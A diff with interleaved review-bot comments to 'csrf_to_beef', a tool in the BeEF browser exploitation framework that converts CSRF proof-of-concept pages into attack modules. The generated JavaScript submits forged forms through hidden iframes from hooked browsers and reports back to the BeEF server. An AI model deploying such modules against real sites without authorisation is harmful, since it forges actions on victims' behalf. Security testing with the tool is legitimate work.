diff --git a/tools/csrf_to_beef/csrf_to_beef b/tools/csrf_to_beef/csrf_to_beef
index b22b40d1a..dd16d44ef 100755
--- a/tools/csrf_to_beef/csrf_to_beef
+++ b/tools/csrf_to_beef/csrf_to_beef
@@ -5,14 +5,14 @@
 # * support xhr #
 # * support multipart file upload #
 # * support CORS requests #
-# * support character encoding #
 ################################################################################
 $VERBOSE = false
-$VERSION = '0.0.1'
+$VERSION = '0.0.2'
 require 'uri'
 require 'getoptlong'
 require 'fileutils'
+require 'htmlentities'
 #
 # @note Ruby version check
@@ -145,7 +145,7 @@ class ModuleFile
 def generate class_name, target_url, options
 options_rb = ""
 options.to_enum.with_index(1).each do |input, input_index|
- options_rb += " { 'name' => 'input_#{input_index}', 'ui_label' => '#{input[0]}', 'value' => '#{input[1]}' },\n"
+ options_rb += " { 'name' => 'input_#{input_index}', 'ui_label' => %q(#{input[0]}), 'value' => %q(#{input[1]}) },\n"
 end
 return <<-EOF
 #
@@ -157,8 +157,8 @@ class #{class_name.capitalize} < BeEF::Core::Command
 def self.options
 return [
- { 'name' => 'target_url', 'ui_label' => 'Target URL', 'value' => '#{target_url}' },
-#{options_rb}
+ { 'name' => 'target_url', 'ui_label' => 'Target URL', 'value' => %q(#{target_url}) },
+#{options_rb.chomp}
 ]
 end
@@ -178,7 +178,7 @@ class CommandFile
 def generate class_name, method, enctype, options
 options_js = ""
 options.to_enum.with_index(1).each do |input, input_index|
- options_js += " {'type':'hidden', 'name':'#{input.first}', 'value':'<%= @input_#{input_index} %>' },\n"
+ options_js += " {'type':'hidden', 'name':'#{input.first.to_s.gsub(/'/, "\\'")}', 'value':'<%= CGI.escape(@input_#{input_index}) %>' },\n"
 end
 return <<-EOF
 //
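Review bot: `require 'htmlentities'` in the header hunk pulls in a gem outside the standard library, but nothing in the hunks in view calls it, so a reader cannot tell what the new dependency is for; the removed "support character encoding" TODO hints at the purpose, but that is inference. A one-line comment at the require stating what it is used for would document it, and if the gem is optional for the tool's core path, wrapping the require in `begin ... rescue LoadError` with a short install hint would keep the failure mode readable when the gem is not installed.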
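Review bot: `%q(...)` on the added line in `ModuleFile#generate` does not make the generated module robust to arbitrary field names and values: `%q` still processes backslash escapes and requires balanced parentheses, so a value with an unbalanced `)` or a trailing `\` yields a module file that fails to parse. Since these strings are taken from the parsed PoC file, emit a proper Ruby literal instead, `'ui_label' => #{input[0].to_s.inspect}, 'value' => #{input[1].to_s.inspect}`, and likewise `'value' => #{target_url.to_s.inspect}` in the @@ -157 hunk; `String#inspect` escapes quotes, backslashes and `#{` so the output is always a valid literal. The `return <<-EOF` heredoc this hunk starts continues outside the hunk.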
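Review bot: `gsub(/'/, "\\'")` on the added line in `CommandFile#generate` does not produce `\'`: in a gsub replacement string `\'` is the post-match back-reference, so `"it's".gsub(/'/, "\\'")` returns `"itss"` and the quote is dropped rather than escaped. The block form takes the replacement literally, `input.first.to_s.gsub("'") { "\\'" }`; the same substitution appears three more times in the @@ -188 hunk (`method`, `enctype`, and the `"\\\\'"` form, which the heredoc reduces to the same `"\\'"` in the rendered template). Separately, `CGI.escape` here form-encodes a value that is then placed in a JS string literal, so if the value is later submitted as a form field it is presumably encoded a second time by the browser; escaping for the JS literal (for example `to_json`) would be the matching transform, if `json` is available in the module's context. `CGI` itself is only defined if `cgi` is required somewhere not visible in this diff.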
@@ -188,21 +188,33 @@ class CommandFile
 //
 beef.execute(function() {
- var target_url = '<%= @target_url %>';
+ var target_url = '<%= @target_url.to_s.gsub(/'/, "\\\\'") %>';
 var timeout = 15;
- var #{class_name}_iframe_<%= @command_id %> = beef.dom.createIframeXsrfForm(target_url, "#{method}", "#{enctype}",
+ exploit = function() {
+ var #{class_name}_iframe_<%= @command_id %> = beef.dom.createIframeXsrfForm(target_url, '#{method.to_s.gsub(/'/, "\\'")}', '#{enctype.to_s.gsub(/'/, "\\'")}',
 [
-#{options_js}
+#{options_js.chomp}
 ]);
- beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
+ beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
+ }
 cleanup = function() {
- document.body.removeChild(#{class_name}_iframe_<%= @command_id %>);
+ try {
+ document.body.removeChild(#{class_name}_iframe_<%= @command_id %>);
+ } catch(e) {
+ beef.debug("Could not remove iframe: " + e.message);
+ }
 }
 setTimeout("cleanup()", timeout*1000);
+ try {
+ exploit();
+ } catch(e) {
+ beef.debug("Exploit failed: " + e.message);
+ }
+
 });
 EOF
 end
@@ -226,7 +238,7 @@ def main fname, mname
 end
 # parse PoC file
- if html.to_s =~ /var xhr = new XMLHttpRequest/
+ if html.to_s =~ /var xhr = new XMLHttpRequest/
 print_error "Could not parse PoC file - XMLHttpRequest is not yet supported."
 exit 1
 elsif html.to_s !~ /
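Review bot: The escaping added for `target_url` only covers the single quote, so a URL containing a backslash or a line break still breaks the JS string literal it is interpolated into, and the replacement `"\\'"` that the heredoc's `\\\\'` becomes in the rendered template is read by gsub as the post-match back-reference rather than a literal `\'`. Rendering the value as a JSON literal handles all of these in one step, `var target_url = <%= @target_url.to_s.to_json %>;`, provided `json` is loaded in the module's context; the `method` and `enctype` interpolations on the `createIframeXsrfForm` line have the same back-reference problem and can use `gsub("'") { "\\'" }`. `exploit` is also assigned without `var` and so becomes a global like the existing `cleanup`; `var exploit = function() {` keeps it local to the `beef.execute` callback.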